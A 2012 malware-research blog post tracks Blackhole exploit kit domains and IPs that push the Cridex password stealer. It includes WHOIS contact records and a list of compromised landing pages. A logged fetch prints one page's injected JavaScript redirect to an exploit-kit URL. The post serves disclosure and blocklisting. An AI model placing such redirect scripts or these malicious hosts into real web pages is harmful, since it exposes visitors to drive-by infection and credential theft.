Wednesday, December 12, 2012

Update: The BHEK Users of Trojan Password Stealer BadActors is Shifting Their Evil Service into Germany VPS at AS25074 (SECURENETZ-DE)

We our past three incident Spam to BlackHole(BHEK) Trojan Cridex (see below url's posts)

Was conducted by a CyberCrime Group with the evil DNS service exposed below:

We just spotted these criminals are continuing infection & moving their 
Blackhole2 Infector service into the Germany VPS: SECURENETZ-DE ,
as per details below: [PLEASE BLACKLIST THESE!]
ganiopatia.ru A 212.162.52.180 pelamutrika.ru A 212.162.52.180 aliamognoa.ru A 212.162.52.180 ahiontota.ru A 212.162.52.180 anifkailood.ru A 212.162.52.180 genevaonline.ru A 212.162.52.180 podarunoki.ru A 212.162.52.180 aseniakrol.ru A 212.162.52.180 pitoniamason.ru A 212.162.52.180 dimarikanko.ru A 212.162.52.180 ganiopatia.ru A 212.162.56.210 pelamutrika.ru A 212.162.56.210 aliamognoa.ru A 212.162.56.210 ahiontota.ru A 212.162.56.210 anifkailood.ru A 212.162.56.210 genevaonline.ru A 212.162.56.210 podarunoki.ru A 212.162.56.210 aseniakrol.ru A 212.162.56.210 pitoniamason.ru A 212.162.56.210 dimarikanko.ru A 212.162.56.210 ahiontota.ru A 212.162.13.230 NEW DOMAINS in NEW VPS IP ADDRESS anifkailood.ru A 212.162.13.230 podarunoki.ru A 212.162.13.230 aseniakrol.ru A 212.162.13.230 pitoniamason.ru A 212.162.13.230 amnaosogo.ru A 212.162.13.230 dimarikanko.ru A 212.162.13.230 aofngppahgor.ru A 212.162.13.230 ←NEW DOMAIN [aofngppahgor.ru]
With the below WHOIS details:
inetnum:        212.162.56.0 - 212.162.57.255
netname:        SECURENETZ-DE
descr:          Secure-Netz
country:        de
admin-c:        NK1733-RIPE
tech-c:         MATT69-RIPE
status:         ASSIGNED PA
remarks:        all abuse reports to abuse@level3.com
mnt-by:         LEVEL3-MNT
mnt-lower:      LEVEL3-MNT
source:         RIPE # Filtered

person:         Matthew Duncalf
address:        Level (3) Communications
address:        Level 3 House
address:        66 Prescot Street
address:        London, E1 8HG UK
phone:          +44 20 7961 8468
fax-no:         +44 20 7864 0338
nic-hdl:        MATT69-RIPE
mnt-by:         LEVEL3-MNT
source:         RIPE # Filtered

person:         Nicole Kuehne
address:        Secure-Netz
address:        Am Plan 1
address:        37581 Bad Gandersheim
address:        Germany
phone:          +49 5382 953600
fax-no:         +49 5382 953610
nic-hdl:        NK1733-RIPE
mnt-by:         LEVEL3-MNT
source:         RIPE # Filtered
Conrad of Dynamoo blog is also have same reference of these new service (grep IP of 212.162.*) -->>[HERE]

Spam Infector Redirection URL List

Below is the PoC by the spam emails infected url infector landing pages:
h00p://www.jiaenhospital.com/mail.htm h00p://www.brsams.com/mail.htm h00p://sat-tesero.it/mail.htm h00p://mondoimmobiliare2010.com/mail.htm h00p://www.fevaweb.org.ar/mail.htm h00p://www.sddongrun.com/mail.htm h00p://revolverresine.com/mail.htm h00p://www.freemusicdownloads.eu/mail.htm h00p://www.migar.cn/mail.htm h00p://www.sp3zory.webd.pl/mail.htm h00p://www.vyborpodarka.ru/mail.htm h00p://latinchat.ca/mail.htm h00p://www.templodoaprendiz.com.br/mail.htm h00p://haxlzxs.com/mail.htm h00p://azlj365.com/mail.htm h00p://modaencuba.com/mail.htm h00p://naohide.com/mail.htm h00p://ulbakompleks.kz/mail.htm h00p://www.freelink.com.cn/mail.htm h00p://www.appchat.cn/mail.htm h00p://www.abbeyhealthcare.co.uk/mail.htm h00p://www.kaizer.cn/mail.htm h00p://www.lkedu8.com/mail.htm h00p://www.institutogv.com.ar/mail.htm h00p://mekka-digital.hu/mail.htm :
Log:
$ date
Wed Dec 12 20:00:40 JST 2012

$ Xurl h00p://www.jiaenhospital.com/mail.htm|less
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   422  100   422    0     0     88      0  0:00:04  0:00:04 --:--:--   133
<html>
 <head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
 </head>
 <body>
<h1><b>Please wait a moment ... You will be forwarded... </h1></b>
<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>

<script>
var1=49;
var2=var1;
if(var1==var2) {document.location="h00p://aseniakrol.ru:8080/forum/links/column.php";}
</script>

</body>
</html>

$ host -ta aseniakrol.ru
aseniakrol.ru has address 212.162.52.180
aseniakrol.ru has address 212.162.56.210
 .
I hope the authority will shutdown their domains & DNS soon, for these criminals - are VERY eager to steal credentials from innocent in daily basis. For the Secure-Netz,De, please help to shutdown the usage of these domains under - your VPS immediately.

#MalwareMustDie

1 comment:

  1. The infectors .RU domains were all reported and now all got shutdown: http://pastebin.com/raw.php?i=vh1spiCy

    ReplyDelete